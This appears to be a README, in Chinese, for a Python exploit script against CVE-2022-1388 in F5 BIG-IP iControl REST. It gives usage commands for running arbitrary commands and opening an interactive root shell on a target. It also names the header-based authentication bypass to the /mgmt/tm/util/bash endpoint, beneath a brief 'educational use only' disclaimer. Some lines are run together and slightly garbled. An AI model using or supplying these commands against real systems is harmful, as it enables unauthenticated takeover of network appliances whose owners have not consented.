该 Python 脚本利用 CVE-2022-1388,一个 F5 BIG-IP iControl REST 中的严重漏洞,由于不正确的访问控制和 HTTP 标头处理,允许未经身份验证的远程命令执行。
⚠️ 仅用于教育和授权的安全研究。请勿用于您不拥有或未经明确许可测试的系统。
--shell)python3 cve_2022_1388_exploit.py -u <目标URL> -c "<命令>"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -c "id"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -a "root:password" -c "whoami"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 --shell
X-F5-Auth-Token 和 Authorization 标头绕过认证。/mgmt/tm/util/bash此漏洞利用脚本仅用于教育目的。使用风险完全由您自行承担。